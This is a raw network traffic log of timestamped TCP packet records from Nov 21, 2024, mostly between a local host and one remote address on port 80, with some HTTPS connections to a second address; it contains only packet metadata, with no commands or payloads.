                                                                                                                                                                        Nov 21, 2024 10:37:46.735975027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.736193895 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.736809015 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.736912012 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.736968994 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.737693071 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.737735033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.737807035 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.738544941 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.738651037 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.738758087 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.739490986 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.739609957 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.739670992 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.740407944 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.740529060 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.740654945 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.741322041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.741455078 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.741492987 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.742264986 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.742288113 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.742321968 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.743200064 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.743438959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.743496895 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.744155884 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.744287968 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.744327068 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.745107889 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.745260954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.745322943 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.745966911 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.746144056 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.746177912 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.746886015 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.747014999 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.747785091 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.747823954 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.747987986 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.748403072 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.748692036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.748886108 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.748922110 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.749649048 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.749741077 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.749790907 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.750550032 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.750617981 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.751012087 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.751059055 CET4434979013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.751460075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.751540899 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.751585960 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.751669884 CET49790443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:46.751701117 CET4434979013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.752188921 CET49790443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:46.752194881 CET4434979013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.752391100 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.752466917 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.752502918 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.753281116 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.753406048 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.754215956 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.754259109 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.754271030 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.754296064 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.755167961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.755361080 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.755403996 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.756169081 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.756181955 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.756227016 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.756969929 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.757087946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.757132053 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.757924080 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.758043051 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.758109093 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.758826971 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.759005070 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.759047985 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.759742022 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.759813070 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.759913921 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.760737896 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.760829926 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.760931969 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.761580944 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.761687994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.761727095 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.762454987 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.765172005 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.815731049 CET4434979113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.816234112 CET49791443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:46.816262007 CET4434979113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.816675901 CET49791443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:46.816680908 CET4434979113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.915565014 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.915580034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.915622950 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.915743113 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.915868044 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.915903091 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.916659117 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.916887045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.916918993 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.917587042 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.917722940 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.917758942 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.918544054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.918801069 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.918838024 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.919455051 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.919522047 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.919558048 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.920381069 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.920571089 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.920603991 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.921264887 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.921358109 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.921394110 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.922209024 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.922355890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.922388077 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.923116922 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.923207045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.923274040 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.924046993 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.924143076 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.924175978 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.924957037 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.925072908 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.925143957 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.925915003 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.926062107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.926095963 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.926805019 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.926918983 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.926994085 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.927777052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.927834988 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.927866936 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.928664923 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.928750992 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.928858042 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.929603100 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.929694891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.929729939 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.930509090 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.930644989 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.930675983 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.931508064 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.931732893 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.931768894 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.932341099 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.932506084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.932535887 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.933264017 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.933398962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.933902025 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.934192896 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.934308052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.934343100 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.935143948 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.935326099 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.935359955 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.936002016 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.936125994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.936156988 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.936933994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.937033892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.937066078 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.937872887 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.937988997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.938019037 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.938781023 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.938878059 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.938915014 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.939727068 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.939780951 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.939815044 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.940638065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.940757990 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.940792084 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.941584110 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.941634893 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.941668987 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.942467928 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.942553043 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.942697048 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.943799019 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.943825006 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.943864107 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.944336891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.944461107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.944508076 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.945252895 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.945347071 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.945417881 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.946343899 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.946357965 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.946429968 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.947112083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.947288990 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.948010921 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.948055983 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.948131084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.948407888 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.948924065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.949049950 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.949088097 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.949850082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.949956894 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.949991941 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.950790882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.950890064 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.950932980 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.951699972 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.951811075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.951849937 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.952636003 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.952721119 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.952759027 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.953527927 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.953665018 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.953707933 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.954463959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.954583883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.954626083 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.955365896 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.955517054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.955647945 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.956322908 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.956444025 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.956482887 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.957256079 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.957432985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.957469940 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.958165884 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.958257914 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.958319902 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.959084988 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.959188938 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.959331989 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.959995985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.960114002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.960944891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.960990906 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.961040020 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.961834908 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.961875916 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.961973906 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.962011099 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.962766886 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.962868929 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.962912083 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.963677883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.972897053 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.024080992 CET4434978913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.024153948 CET4434978913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.024230957 CET49789443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.024434090 CET49789443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.024447918 CET4434978913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.024461985 CET49789443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.024466991 CET4434978913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.026969910 CET49794443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.027004957 CET4434979413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.027071953 CET49794443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.027220011 CET49794443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.027231932 CET4434979413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.100971937 CET4434979213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.101486921 CET49792443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.101505995 CET4434979213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.102035999 CET49792443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.102041960 CET4434979213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.116859913 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.117038965 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.117110014 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.117316008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.117436886 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.117477894 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.118294954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.118388891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.118437052 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.119304895 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.119381905 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.119421005 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.120102882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.120220900 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.120264053 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.121023893 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.121146917 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.121226072 CET4978780192.168.2.6185.215.113.16
